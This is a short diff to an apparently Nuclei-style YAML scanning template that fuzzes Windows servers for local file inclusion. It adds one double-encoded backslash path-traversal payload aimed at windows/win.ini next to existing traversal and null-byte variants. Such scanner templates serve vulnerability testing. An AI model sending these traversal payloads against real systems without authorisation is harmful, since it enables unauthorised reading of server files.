--- a/lfi/windows-lfi-fuzz.yaml
+++ b/lfi/windows-lfi-fuzz.yaml
@@ -17,6 +17,7 @@ http:
         - '/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini'
         - '/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini'
         - '/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini'
+        - '/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini'
         - '\WINDOWS\win.ini'
         - '\WINDOWS\win.ini'
         - '\WINDOWS\win.ini%00'
